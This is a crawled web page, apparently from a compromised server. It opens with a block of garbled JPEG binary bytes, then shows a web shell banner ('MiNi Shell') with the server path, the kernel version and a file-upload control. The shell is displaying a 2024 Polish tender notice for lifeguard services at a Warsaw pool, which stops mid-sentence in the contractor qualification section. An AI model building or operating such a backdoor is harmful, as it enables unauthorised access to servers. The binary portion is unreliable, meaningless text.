JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240702/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240702/0039314201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie kompleksowej usługi zabezpieczenia ratowniczego poprzez pełnienie dyżurów ratowniczych na pływalni Ośrodka Sportu i Rekreacji m.st. Warszawy w Dzielnicy Żoliborz. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Sportu i Rekreacji m.st Warszawy w Dzielnicy Żoliborz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 016077929</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Potocka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-652</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(22) 832-45-50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@osir-zoliborz.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://osir-zoliborz.waw.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie kompleksowej usługi zabezpieczenia ratowniczego poprzez pełnienie dyżurów ratowniczych na pływalni Ośrodka Sportu i Rekreacji m.st. Warszawy w Dzielnicy Żoliborz. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f12d82df-3852-11ef-b37c-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00393142</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00025713/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Usługi ratownicze od 01.08.2024 do 31.12.2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://osirzoliborz.ezamawiajacy.pl/pn/osirzoliborz/demand/165096/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://osirzoliborz.ezamawiajacy.pl/pn/osirzoliborz/demand/165096/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Komunikacja w niniejszym postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym <br/>a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej pod adresem https://osirzoliborz.ezamawiajacy.pl zwanej dalej Platformą lub Systemem. <br/>2)	Przekazanie oferty wymaga od Wykonawcy zarejestrowania się i zalogowania na Platformie, zgodnie z poniższą kolejnością. <br/>3)	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. Rejestracja Wykonawcy na Platformie następuje automatycznie poprzez weryfikację adresu e-mail podanego przez Wykonawcę w formularzu rejestracyjnym. <br/>W uzasadnionych przypadkach (np. wprowadzenie danych niezgodnych z danymi rejestrowymi) weryfikacja danych Wykonawcy może trwać maksymalnie do 2 dni roboczych. Mając to na uwadze, Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację <br/>w procesie złożenia Oferty w formie elektronicznej lub w postaci elektronicznej. <br/>4)	Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać komputer Wykonawcy:<br/>•	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na komputer;<br/>•	komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>•	Zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;<br/>•	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>5)	Dopuszczalne wielkości i formaty przesyłanych danych<br/>•	Wielkość pojedynczego pliku zamieszczanego w systemie nieprzekraczająca 100 MB;<br/>•	Dopuszczalne formaty plików: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc<br/>6)	Kodowanie i czas odbioru danych<br/>•	Plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/>•	Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.<br/>Szczegółowe informacje - pkt 3 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe informacje pkt 29 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-3/OSIR/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Świadczenie kompleksowej usługi zabezpieczenia ratowniczego poprzez pełnienie dyżurów ratowniczych na pływalni Ośrodka Sportu i Rekreacji m.st. Warszawy w Dzielnicy Żoliborz.<br/>Miejsce realizacji zamówienia:<br/>Pływalnia przy ul. Potocka 1 w Warszawie.<br/>Godziny otwarcia pływalni: <br/>w dni poniedziałek - czwartek 06:00 – 23:00, <br/>piątek, sobota 06:00 - 01:00 <br/>niedziela 6:00 – 23:00.<br/>Zakres obowiązków Wykonawcy:<br/>Zamawiający posiada ratowników zatrudnionych na umowę o pracę i zadaniem Wykonawcy będzie uzupełnienie obsady ratowniczej płyty pływalni. Wykonawca wykona czynności w zakresie ratownictwa wodnego polegających na prowadzeniu działań ratowniczych, w szczególności na organizowaniu i udzielaniu pomocy osobom, które uległy wypadkowi lub są narażone na niebezpieczeństwo utraty życia lub zdrowia na obszarze wodnym. Usługa będzie świadczona w miejscu wykorzystywanym do kąpieli zgodnie z obowiązującymi przepisami prawa tj. zgodnie z przepisami ustawy z dnia 18 sierpnia 2011 o bezpieczeństwie osób przebywających na obszarach wodnych (t.j. Dz.U. z 2022 r. poz. 147 z późn. zm.) oraz aktami wykonawczymi do tej ustawy.<br/>Szczegółowy zakres obowiązków Wykonawcy:<br/>a.	Świadczenie kompleksowej usługi zabezpieczenia ratowniczego poprzez zapewnienie wykonywania i nadzoru nad bezpieczeństwem osób korzystających z pływalni Ośrodka Sportu i Rekreacji m.st. Warszawy w Dzielnicy Żoliborz zgodnie z obowiązującymi przepisami prawa, szczegółowy zakres obowiązków określają przepisy Ustawy z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (t.j. Dz. U. z 2022r. poz. 145z późn. zm.) wraz z obowiązującymi Rozporządzeniami oraz przepisami prawa w związku z wystąpieniem stanu epidemii lub stanu epidemicznego;<br/>b.	kontrola nad przestrzeganiem postanowień regulaminów obiektów, w szczególności limitów osób mogących korzystać z obiektów, liczby osób mogących korzystać z torów zgodnie z obowiązującymi w tym zakresie przepisami prawa w tym Regulaminu Pływalni;<br/>c.	zapewnienie świadczenia usługi przez osoby posiadające odpowiednie uprawnienia zgodnie z obowiązującymi przepisami prawa, a w szczególności z Ustawą z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (t.j. Dz.U. z 2022 r. poz. 145 z późn. zm. ), Rozporządzeniem MSW z dnia 23 stycznia 2012 r. (tj.Dz. U. z 2022 r poz. 1981) w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych zapewniających stałą kontrolę wyznaczonego obszaru wodnego, Rozporządzeniem MSW z dnia 21 czerwca 2012 r. (Dz. U. z 2012 r poz. 747) w sprawie szkoleń w ratownictwie wodnym oraz Ustawą z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (tj. Dz. U. z 2022 r. poz. 1720)<br/>d.	Zamawiający wymaga od Wykonawcy przed rozpoczęciem realizacji umowy oraz każdorazowo w przypadku zatrudniania nowych osób do realizacji umowy w czasie jej trwania, przedłożenia wykaz osób, które będą wykonywały przedmiot umowy wraz z kopiami uprawnień ratowniczych, ważnym kursem pierwszej pomocy (KPP) lub ważną dokumentacją potwierdzającą posiadanie kwalifikacji ratownika medycznego, lekarza systemu, lub pielęgniarki systemu realizujących doskonalenie zawodowe, oraz kopiami ważnych książeczek sanepidu.<br/>e.	Zamawiający wymaga od Wykonawcy przed rozpoczęciem realizacji umowy oraz każdorazowo w przypadku zatrudniania nowych osób przewidzianych do realizacji umowy w czasie jej trwania, złożenia oświadczenia, że ratownicy posiadają: <br/>aktualne badania lekarskie potwierdzające ich zdolność do wykonywania świadczenia usług na stanowisku ratownika wodnego, aktualną książeczkę do celów sanitarno-epidemiologicznych, przeszkolenie w zakresie przepisów BHP i p.poż.;<br/>f.	Zamawiający wymaga od Wykonawcy przed rozpoczęciem realizacji umowy oraz każdorazowo w przypadku zatrudniania nowych osób przewidzianych do realizacji umowy w czasie jej trwania, złożenia pisemnego oświadczenia, że ratownicy, którym Wykonawca powierzył wykonanie usługi nie widnieją w Rejestrach określonych w art. 6 ust. 1 oraz art. 6 ust. 2 ustawy z dnia 13 maja 2016 r. (t. j. Dz. U. z 2020 r. poz. 152) o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym;<br/>g.	zapewnienie ciągłości obsady stanowisk ratowniczych zgodnie z obowiązującymi przepisami prawa w soboty i niedziele, święta oraz w inne uzgodnione dni;<br/>h.	udzielanie kwalifikowanej pierwszej pomocy, podstawowe opatrzenie ran i urazów, a w poważniejszych przypadkach wezwanie Pogotowia Ratunkowego;<br/>i.	zabezpieczenie w niezbędny sprzęt ratowniczy zgodny z obowiązującymi przepisami, w przypadku gdy sprzęt będący na wyposażeniu OSiR Żoliborz okaże się niewystarczający;<br/>j.	bieżące wyposażenie ratowników w stroje i obuwie zgodne z wymogami i wzorem przekazanym przez zamawiającego i przepisami BHP a także wyposażenie ratowników w środki ochrony indywidualnej zgodnie z przepisami i zaleceniami sanitarnymi w związku z wystąpieniem stanu epidemii lub stanu epidemicznego na terytorium Rzeczypospolitej Polskiej;<br/>k.	dbanie o powierzone mienie ze szczególnym uwzględnieniem sprzętu ratunkowego;<br/>l.	prowadzenie podstawowej dokumentacji i systemu raportowania;<br/>m.	przestrzeganie procedur: obejmowania, przekazywania i zakończenia dyżuru, alarmowych przy wypadkach oraz powstałych w obiekcie zagrożeniach, udzielania pierwszej pomocy przedlekarskiej, łączności;<br/>n.	Wykonawca ponosi pełną odpowiedzialność za świadczone usługi przez ratowników, którym powierzy wykonanie usługi;<br/>o.	Wykonawca odpowiada wobec Zamawiającego za wszelkie szkody wyrządzone Zamawiającemu oraz osobom trzecim przez ratowników, którym powierzył wykonanie usługi, w związku z realizacją zamówienia;<br/>p.	Wykonawca odpowiada za wypadki, kontuzje (itp. zdarzenia) ratowników, którym powierzył wykonanie usługi, nie wynikające z winy Zamawiającego;<br/>q.	W przypadku zgłoszenia jakichkolwiek roszczeń przez osoby trzecie, powstałych w związku z wykonywaniem przedmiotu umowy przez ratowników, którym Wykonawca powierzył wykonanie usługi Wykonawca zobowiązuje się we własnym zakresie do pokrycia wynikających z tego tytułu roszczeń. Wykonawca w powyższym zakresie odpowiada na zasadzie winy. Roszczenia wynikające z wad konstrukcyjnych obiektu wyłączają odpowiedzialność Wykonawcy;<br/>r.	W przypadku gdy Zamawiający poniesie jakiekolwiek koszty związane z roszczeniami zgłoszonymi wobec niego, Wykonawca zobowiązany jest do niezwłocznego dokonania zapłaty na rzecz Zamawiającego kwoty równej poniesionym kosztom, w terminie nie dłuższym niż 7 dni od daty pisemnego wezwania do zapłaty od Zamawiającego. Wykonawca w powyższym zakresie odpowiada na zasadzie winy;<br/>s.	Wykonawca oraz ratownicy, którym Wykonawca powierzył wykonanie usługi nie mogą prowadzić nauki pływania w trakcie pełnienia usługi zabezpieczenia ratowniczego w ramach realizacji umowy. <br/>Miejsce realizacji zamówienia:<br/>Szacowana średnia ilość godzin ratowniczych w miesiącu –631.<br/>Dni i godziny pracy mogą ulec zmianie w zależności od obłożenia pływalni, organizowanych zajęć i innych potrzeb Zamawiającego. <br/>t.	Zamawiający będzie przekazywał Wykonawcy zapotrzebowanie na następny miesiąc do 20 dnia bieżącego miesiąca a Wykonawca przekaże Imienny harmonogram świadczenia usług przez ratowników na wszystkie dni następnego miesiąca, najpóźniej na 5 dni przed rozpoczęciem miesiąca,<br/>Zamawiający zastrzega sobie możliwość zmian ww. podziałów godzinowych w ramach godzin zegarowych. <br/>Przewidywana łączna maksymalna ilość godzin ratowniczych w okresie realizacji zamówienia wynosi 3157 godzin. Liczba godzin została przyjęta do kalkulacji wyłącznie na potrzeby niniejszego postępowania w celu oszacowania wartości zamówienia i może ulec zmniejszeniu w zależności od faktycznego zapotrzebowania na usługi ratownicze.<br/>Przez jedną godzinę ratowniczą Zamawiający rozumie świadczenie usługi ratownictwa wodnego oraz pierwszej pomocy przedlekarskiej przez jedną osobę w ciągu jednej godziny (60 minut). Wykonawca przyjmuje do wiadomości, iż wskazana w powyżej ilość godzin jest jedynie ilością szacunkową i może ulec zmniejszeniu, w szczególności w przypadku przerwy w funkcjonowaniu pływalni spowodowanej m.in. wymaganiami technologicznymi, modernizacją, remontem lub awarią, a także zmianą godzin pracy.<br/>Ze względów organizacyjnych, proceduralnych, technicznych, ekonomicznych, konieczności wprowadzenia przerw technologicznych, awarii Zamawiający uprawniony jest do ograniczenia ilości usług świadczonych przez Wykonawcę. W tym celu Zamawiający legitymuje się prawem odwołania usług w godzinach i okresach przez siebie określonych. <br/>Obowiązki wynikające z klauzuli społecznej <br/>a.	Zamawiający w przedmiotowym postępowaniu stosuje klauzulę społeczną na podstawie art. 95 ust. 1 ustawy Prawo zamówień publicznych. <br/>b.	Wykonawca zobowiązuje się, że w trakcie realizacji Przedmiotu Umowy wszyscy ratownicy skierowani do realizacji przedmiotu umowy, przez cały okres realizacji Przedmiotu Umowy, będą zatrudnieni na podstawie umowy o pracę w rozumieniu Kodeksu Pracy przez Wykonawcę lub Podwykonawcę.<br/>c.	Warunek, o którym mowa w ust. b zostanie spełniony poprzez zatrudnienie na podstawie umowy o pracę nowych pracowników lub wyznaczenie do realizacji zamówienia zatrudnionych już osób wykonujących czynności ratowników.<br/><br/>Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SWZ stanowiący jednocześnie załącznik nr 2 do projektowanych postanowień umowy oraz:<br/>a)	projektowane postanowienia umowy stanowiące załącznik nr 3 do SWZ<br/>b)	regulamin pływalni stanowiący załącznik nr 7 do SWZ stanowiący jednocześnie załącznik nr 7 do projektowanych postanowień umowy<br/>c)	wykaz obowiązków ratowników stanowiący załącznik nr 6 do SWZ stanowiący jednocześnie załącznik nr 1 do projektowanych postanowień umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">75252000-7 - Służby ratownicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71317200-5 - Usługi w zakresie ochrony zdrowia i bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oceny ofert będzie dokonywała Komisja przetargowa.<br/><br/>Kryteria oceny ofert<br/>W celu wyboru najkorzystniejszej oferty Zamawiający przyjął następujące kryteria przypisując mu odpowiednią wagę procentową:<br/>1)	Kryterium: „cena brutto” – waga 70%<br/>2)	Kryterium: „czas reakcji”– waga 30%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy wykażą, że:<br/>1)	W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>a)	Posiadają decyzję (zgodę) ministra właściwego do spraw wewnętrznych na wykonywanie ratownictwa wodnego wydanej na podstawie art. 12 ust. 1 ustawy z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (t.j.: Dz. U z 2023 r. poz. 714 z późn. zm.) <br/>oraz<br/>b)	Posiadają wpis do rejestru jednostek współpracujących z systemem Państwowe Ratownictwo Medyczne, o którym mowa w art. 17 ust. 1 ustawy z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (t.j.: Dz. U. z 2023 r. poz. 1541 ze późn.zm.).<br/>2)	w zakresie zdolności technicznej lub zawodowej: <br/>W okresie ostatnich trzech lat przed upływem terminu składania ofert, w tym okresie, wykonali (tj. zakończyli)1 lub wykonują2 co najmniej dwie usługi ratownictwa wodnego (nadzoru ratowniczego) nad osobami korzystającymi z pływalni krytej z których każda spełniała łącznie poniższe wymagania:<br/>•	była wykonywana przez co najmniej 5 miesięcy,<br/>•	wartości usługi była nie mniejsza niż 90 000,00 zł brutto.<br/>Uwaga!<br/>Za wykonaną usługę Zamawiający uzna taką usługę której przedmiot został odebrany przez Zamawiającego jako wykonany należycie.<br/>1Za wykonaną usługę Zamawiający uzna taką usługę, którą Wykonawca wykonał na rzecz jednego Zamawiającego i której przedmiot został odebrany przez Zamawiającego jako wykonany należycie.<br/>2W przypadku gdy Wykonawca wykaże się usługą, która jest w toku realizacji, Zamawiający uzna warunek za spełniony, jeżeli na dzień składania ofert wartość usługi już wykonanej będzie nie mniejsza 